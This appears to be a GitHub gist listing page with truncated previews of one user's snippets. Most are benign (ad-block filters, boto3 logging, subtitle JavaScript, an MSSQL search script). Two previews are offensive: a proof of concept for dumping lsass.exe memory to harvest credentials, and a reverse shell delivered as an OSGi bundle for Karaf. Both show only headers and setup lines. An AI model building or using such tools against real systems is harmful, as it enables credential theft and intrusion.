Skip to content

Instantly share code, notes, and snippets.

Avatar

2XXE GeneralTesler

View GitHub Profile
@GeneralTesler
GeneralTesler / refl.cpp
Last active Nov 17, 2021
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
View refl.cpp
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE
View filters.txt
! hide annoying google drive modal that prompts to sign in
docs.google.com##.docs-dialog.modal-dialog
docs.google.com##.modal-dialog-bg
! crunchyroll filters
||fwmrm.net/ad/*
||facebook.com/rtb_video/*
||crunchyroll.com/*.mp4
@GeneralTesler
GeneralTesler / funi.md
Created Aug 17, 2020
Enable subtitles on Funimation web player
View funi.md

Enable subtitles on Funimation web player using VideoJS addRemoteTextTrack

// get the player iframe 
var frame = document.getElementsByTagName("iframe")[0].contentWindow
// get the videojs object inside the iframe 
// fp is the instance of the FunimationPlayer inside the iframe and stores the text track info
//     vtt is usually the first item in the text track list
frame.videojs.getPlayer("brightcove-player").addRemoteTextTrack(frame.fp.currentVideo.source.textTracks[0])
@GeneralTesler
GeneralTesler / boto3_log.py
Created May 25, 2020
Log AWS API calls using boto3 event system
View boto3_log.py
# see: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/events.html#provide-client-params
import boto3
from botocore.client import Config
from botocore import UNSIGNED
import json
def intercept_params(params, **kwargs):
print(
json.dumps(
@GeneralTesler
GeneralTesler / boto3_patch.py
Last active May 25, 2020
Patch botocore to log API calls + parameters
View boto3_patch.py
import boto3
import botocore
from botocore.client import BaseClient, Config, ClientMeta
import json
def log_api(self, operation_name, api_params):
meta: ClientMeta = self.meta
print(
json.dumps(
@GeneralTesler
GeneralTesler / ladon.go
Created Feb 17, 2020
basic code for using Ladon; taken + merged from readme: https://github.com/ory/ladon
View ladon.go
package main
import (
"log"
"github.com/ory/ladon"
manager "github.com/ory/ladon/manager/memory"
)
func main() {
@GeneralTesler
GeneralTesler / mssql.ps1
Last active Dec 15, 2019
Search MSSQL databases for columns containing keywords using SqlServer PowerShell PSDrive
View mssql.ps1
Import-Module SqlServer
function Get-SQLTablesByKeyword {
<#
Usage:
Get-SQLTablesByKeyword -Computer <hostname>
Example:
Get-SQLTablesByKeyword -Computer sql01.domain.local
Example Output:
Table Database Column
View lambda_gscript.json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"ssm:SendCommand",
"codepipeline:PutJobFailureResult",
"codepipeline:PutJobSuccessResult",
View gscript_lambda.py
import json,os,boto3
def lambda_handler(event, context):
iid = os.getenv('INSTANCE_ID',None)
pd = os.getenv('PAYLOAD_DIR',None)
pipeline = boto3.client('codepipeline')
job = event['CodePipeline.job']['id']
if iid is None or pd is None:
@GeneralTesler
GeneralTesler / ExecActivator.java
Last active Dec 6, 2019
simple reverse shell via OSGi bundle for Karaf
View ExecActivator.java
package com.demo.exec;
import org.osgi.framework.BundleActivator;
import org.osgi.framework.BundleContext;
import java.lang.*;
public class ExecActivator implements BundleActivator {
@Override
public void start(BundleContext bundleContext) throws Exception {